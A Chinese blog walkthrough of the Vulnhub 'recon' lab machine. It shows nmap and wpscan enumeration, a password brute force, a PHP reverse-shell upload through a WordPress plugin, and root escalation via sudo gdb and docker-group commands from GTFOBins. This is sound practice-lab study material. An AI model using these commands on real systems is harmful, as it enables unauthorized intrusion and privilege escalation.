首页 > 其他分享 >Vulnhub:recon靶机

Vulnhub:recon靶机

时间:2023-02-13 16:11:06浏览次数:63  
标签:shell 111.188 recon 192.168 -- gtfobins wpscan Vulnhub 靶机

kali:192.168.111.111

靶机:192.168.111.188

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.188

image

访问web发现是wordpress网站

image

使用wpscan收集到两个用户名

wpscan --url http://192.168.111.188 -e u

image

wpscan爆破,得到账号密码:reconauthor|football7

wpscan --url http://192.168.111.188 -U user.txt -P /usr/share/wordlists/rockyou.txt

image

登录后台后选择Posts -> Add New -> e_Learning,上传反弹shell

image

image

这里需要上传zip压缩包,压缩包里需要有php反弹shell和至少一个html文件

zip php-reverse-shell.zip php-reverse-shell.php z.html

image

image

image

上传完成后访问该路径:/wp-content/uploads/articulate_uploads/shell/

image

image

获得反弹shell

image

提权

www-data用户sudo -l

image

提权方法:https://gtfobins.github.io/gtfobins/gdb/#sudo

image

切换到offensivehack用户

sudo -u offensivehack gdb -nx -ex '!sh' -ex quit

image

发现offensivehack用户处于docker组,提权方法:https://gtfobins.github.io/gtfobins/docker/

image

输入该命令获得root权限

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

image

获得flag

image

标签:shell,111.188,recon,192.168,--,gtfobins,wpscan,Vulnhub,靶机
From: https://www.cnblogs.com/ctostm/p/17116760.html

相关文章

  • 通过FTP获得靶机Shell步骤说明
    通过FTP获得靶机Shell步骤说明当已经获取到FTP的用户名和密码,并且该用户有权限上传文件以及创建文件,那么基于此获取Shell的步骤如下:1.在KaliLinux上利用ssh-keygen命令......
  • Vulnhub之Chakravyuh详细测试过程
    Chakravyuh识别目标主机IP地址─(root......
  • Vulnhub之BassamCTF靶机详细测试过程
    BassamCTF靶机信息名称:bassamCTF:1地址:https://www.vulnhub.com/entry/bassamctf-1,631/识别目标主机IP地址─(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]└─$......
  • vulnhub之Jerome
    一、信息收集1、c段扫描,获取靶机IP┌──(kali㉿kali)-[~]└─$sudonmap-sn192.168.62.129/24[sudo]passwordforkali:StartingNmap7.93(https://nmap.org)......
  • Vulnhub:maskcrafter-1.1靶机
    kali:192.168.111.111靶机:192.168.111.187信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.187ftp匿名登陆发现两个文件ftp192.168.111.1......
  • DVWA靶机-全级别测试-XSS(Stored)
    存储型的XSS存储型XSS又称持久型XSS,攻击脚本将被永久地存放在目标服务器的数据库或文件中,具有很高的隐蔽性低难度设置如下:源代码:<?phpif(isset($_POST['btnSign']))......
  • Vulnhub:PowerGrid-1.0.1靶机
    kali:192.168.111.111靶机:192.168.111.182信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.182访问web,发现三个用户名目录爆破发现zmail......
  • CFS三层靶机-内网环境渗透
    <1>靶场介绍及环境配置三个主机的网络环境拓扑图,攻击机的网段在192.168.236.0/24,三台靶机的IP地址分别如图:上面的Target1、2、3分别对应CentOS7、Ubuntu、Windows7三......
  • vulnhub靶场之VENOM: 1
    准备:攻击机:虚拟机kali、本机win10。靶机:Venom:1,下载地址:https://download.vulnhub.com/venom/venom.zip,下载后直接vbox打开即可。知识点:enum4linux扫描、敏感信息发现......
  • vulnhub靶场之CEREAL: 1
    准备:攻击机:虚拟机kali、本机win10。靶机:Cereal:1,下载地址:https://download.vulnhub.com/cereal/Cereal.ova,下载后直接vbox打开即可。知识点:/etc/passwd文件提权、dns解......